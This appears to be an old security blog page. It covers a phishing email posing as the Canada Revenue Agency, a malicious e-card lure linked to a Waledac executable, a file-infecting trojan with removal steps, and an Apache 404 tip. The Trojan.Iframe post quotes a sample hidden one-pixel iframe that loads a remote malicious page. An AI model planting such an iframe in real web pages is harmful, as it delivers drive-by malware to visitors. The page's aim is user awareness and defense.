Usually when you type a wrong address for a website, you will get a 'so called' 404 page. Actually 404 is an error code given by the web server when a requested page was not found. Now, if you are a web developer or an administrator for a domain, you may want to redirect the users to the main page (let's say index.html)
All you have to do is to add this rule in your .htaccess file:
ErrorDocument 404 /index.html
Enjoy :)
Saturday, March 14, 2009
Friday, March 13, 2009
Money from Canadian Revenue Agency
I think I'm lucky this year. I just received an e-mail from the Canada Revenue Agency telling me that I'm eligible for a tax refund of 386.00
Cool!!! .. but hey, I don't live in Canada, what is going on ?
The e-mail looks ok, as you can see below:
Now, the fake website for the online refund form is in Taiwan and last time I looked, Taiwan wasn't a part of Canada.
If we start analyzing we can see that this is just another case of identity theft. You have there the following elements:
Social Insurance Number, DOB(date of birth), and the Full Name.
So, unfortunatelly it's just a spam, it was too good to be true, maybe next time..
Cool!!! .. but hey, I don't live in Canada, what is going on ?
The e-mail looks ok, as you can see below:
Canada Revenue Agency
Online Refund Form
After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 386.00.
Please submit the tax refund and allow us 3-9 days in order to process it.
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.
To access the form for your tax refund, please click here
Copyright Canada Revenue Agency. All rights reserved. www.cra-arc.gc.ca
Now, the fake website for the online refund form is in Taiwan and last time I looked, Taiwan wasn't a part of Canada.
If we start analyzing we can see that this is just another case of identity theft. You have there the following elements:
Social Insurance Number, DOB(date of birth), and the Full Name.
So, unfortunatelly it's just a spam, it was too good to be true, maybe next time..
Happy greetings e-card is waiting for you
The anatomy of a greeting:
Just opened the mail in the morning and I see in the junk folder an interesting message.
It appeares that someone sent me an e-card, too bad is not my birthday.
The mail looks like this:
Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=?-XXXXX..X-
This card was sent from 123greetings.com!
At first glance this may look valid to anyone. 123greetings.com is a valid websites with some lovely e-cards.
Now the question that arise, is why the link isn't from 123greetings.com ?
So, we downloaded the webpage and had such a "BIG" surprise, it has a link to a "card.exe". Now that's funny.
How many clean exe e-cards from 123greetings have you seen ? The correct answer is NONE
Fortunately, the "card.exe" (MD5:88dfdfa6ba077c18df753f279a51258d) is already detected by us and several antivirus scanners:
Email-Worm.Win32.Iksmas.by(Kaspersky), W32/Waledac.gen.a(McAfee), Trojan:Win32/Waledac.B(Microsoft)
So, we can learn from this e-mail the fact that even if someone sends us a message that appears to be from a valid website, always check the link to see where it points to.
Enjoy :)
Just opened the mail in the morning and I see in the junk folder an interesting message.
It appeares that someone sent me an e-card, too bad is not my birthday.
The mail looks like this:
Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=?-XXXXX..X-
This card was sent from 123greetings.com!
At first glance this may look valid to anyone. 123greetings.com is a valid websites with some lovely e-cards.
Now the question that arise, is why the link isn't from 123greetings.com ?
So, we downloaded the webpage and had such a "BIG" surprise, it has a link to a "card.exe". Now that's funny.
How many clean exe e-cards from 123greetings have you seen ? The correct answer is NONE
Fortunately, the "card.exe" (MD5:88dfdfa6ba077c18df753f279a51258d) is already detected by us and several antivirus scanners:
Email-Worm.Win32.Iksmas.by(Kaspersky), W32/Waledac.gen.a(McAfee), Trojan:Win32/Waledac.B(Microsoft)
So, we can learn from this e-mail the fact that even if someone sends us a message that appears to be from a valid website, always check the link to see where it points to.
Enjoy :)
MD5 database for Vista
Here you can find a database with MD5 sums for files that can be found in the %systemdir% in Vista.
How to create a native application in C
First, read this article. So, you will only need a Windows DDK (Driver Development Kit).
After that, you need to create 2 files in your working directory:
makefile
and
sources
Now create your myprog.c file and don't forget to use only Native API's. When you're done, run the checked/free windows ddk command prompt, go to your working folder and type the following command:
If everything was ok, you should have a new folder (like objchk_wxp_x86, objfree_wxp_x86, etc) with an exe in it. Btw, don't forget that you can't run it like a normal windows app!
Enjoy :)
After that, you need to create 2 files in your working directory:
makefile
!INCLUDE $(NTMAKEENV)\makefile.def and
sources
TARGETNAME=myprog
TARGETPATH=OBJ
TARGETTYPE=PROGRAM
SOURCES=myprog.c
Now create your myprog.c file and don't forget to use only Native API's. When you're done, run the checked/free windows ddk command prompt, go to your working folder and type the following command:
build If everything was ok, you should have a new folder (like objchk_wxp_x86, objfree_wxp_x86, etc) with an exe in it. Btw, don't forget that you can't run it like a normal windows app!
Enjoy :)
Trojan.Iframe
- What it is, what it does
[Description]
[Clean]
[Description]
You can find it almost anywhere, it is small and can hardly be seen :)
You can encounter it even on websites that are supposed to be clean because malicious people are using all kinds of exploits for known platforms in order to successfully append a small piece of code to a certain web page.
In order to understand it better, let me show you how it appears:
iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden
(other variants are the same, there are different atributes, sources, etc.. but they have the same behaviour)
As you can see, it isn't something extraordinary, just one line of code.. but let's see what it does.
First it will create an invisible frame that points to a certain website. Usually that website is a fake one or a real one that was hacked.
Now, the content that is received from that IP it is malicious. It can be an exploit, for example a specially crafted image that when is rendered it will trigger a buffer overflow and arbitrary code will be executed. This has the potential to take over the entire machine and add it to a very large botnet.
A botnet is a network of zombie computers that have the purpose to serve a malicious person. They can send spam, attack other computer causing a Denial Of Service, etc...
Also, it can add a keylogger in order to gather passwords, credit card numbers and other confidential informations.
Their primary purpose is to gather money, so they will continue to do this and alot more in order to ensure that.
Now, as you can see, with just one line of code someone can have access to your entire system. It can even monitor your activity right now...
[Clean]
What you can do in order to prevent this.. hmm.. not much. If you are a regular user that don't want to do complicated things, then you can just have an antivirus installed and keep your computer updated.
If you are a person that cares very much about security then you can add a few more layers of protection, for example you can just use a virtual machine (VMWare, VirtualPC, etc..) in order to navigate on the internet.
But usually if you have a good antivirus installed and updated, then you can say that you are protected, but don't navigate on malicious websites :)
Still, if the antivirus warns you about it, then usually all you have to do is to delete the infected file (this can be achieved by deleting the temporary internet files, or the cache, it depends on your browser).
Trojan.VB.28672
(aka Win-Trojan/Landa.28672, Trojan.VB.AE, Worm/VB.JZ, W32/Backdoor.IBK, Trj/Riwomuz.A, Trojan.Fasiat )
[Description]
The trojan aims to appear as a valid picture, movie or a valid application.
This is the spreading method, by searching for media files or applications and coping itself there with a similar name
When it is run, it will show a message box with one of the following fake errors:
After that it start to search in all the folders for media files (avi, jpg and mp3 extensions)
If it finds a media file, then it copies itself in the same folder, borrow the same name
but adds the .exe extension (eq: picture1.jpg.exe)
Also, it search for application files (exe extension)
If it finds an exe file, then it copies itself in the same folder but it will add a random letter
in front of the name.
Also it checks the size of every file and if it is 28,672 bytes, it will not infect it. It does that
in order to avoid creating a copy for a file that is already infected
You can easily check if the virus is active by opening Task Manager and looking for a "L_and_A"
application like in the following picture:
[Clean]
Download our removal tool (Trojan.VB.28672-removaltool.zip) and restart the system in safe mode.
Extract the contents of the zip file to a folder. After that go to the folder where you have extracted
the contents of the archive and double click on the removaltool application. An easy to use graphical
interface will appear. You have to check the "Scan and clean" option and press on the "Scan" button.
[Description]
The trojan aims to appear as a valid picture, movie or a valid application.
This is the spreading method, by searching for media files or applications and coping itself there with a similar name
When it is run, it will show a message box with one of the following fake errors:
After that it start to search in all the folders for media files (avi, jpg and mp3 extensions)
If it finds a media file, then it copies itself in the same folder, borrow the same name
but adds the .exe extension (eq: picture1.jpg.exe)
Also, it search for application files (exe extension)
If it finds an exe file, then it copies itself in the same folder but it will add a random letter
in front of the name.
Also it checks the size of every file and if it is 28,672 bytes, it will not infect it. It does that
in order to avoid creating a copy for a file that is already infected
You can easily check if the virus is active by opening Task Manager and looking for a "L_and_A"
application like in the following picture:
[Clean]
Download our removal tool (Trojan.VB.28672-removaltool.zip) and restart the system in safe mode.
Extract the contents of the zip file to a folder. After that go to the folder where you have extracted
the contents of the archive and double click on the removaltool application. An easy to use graphical
interface will appear. You have to check the "Scan and clean" option and press on the "Scan" button.
Subscribe to:
Posts (Atom)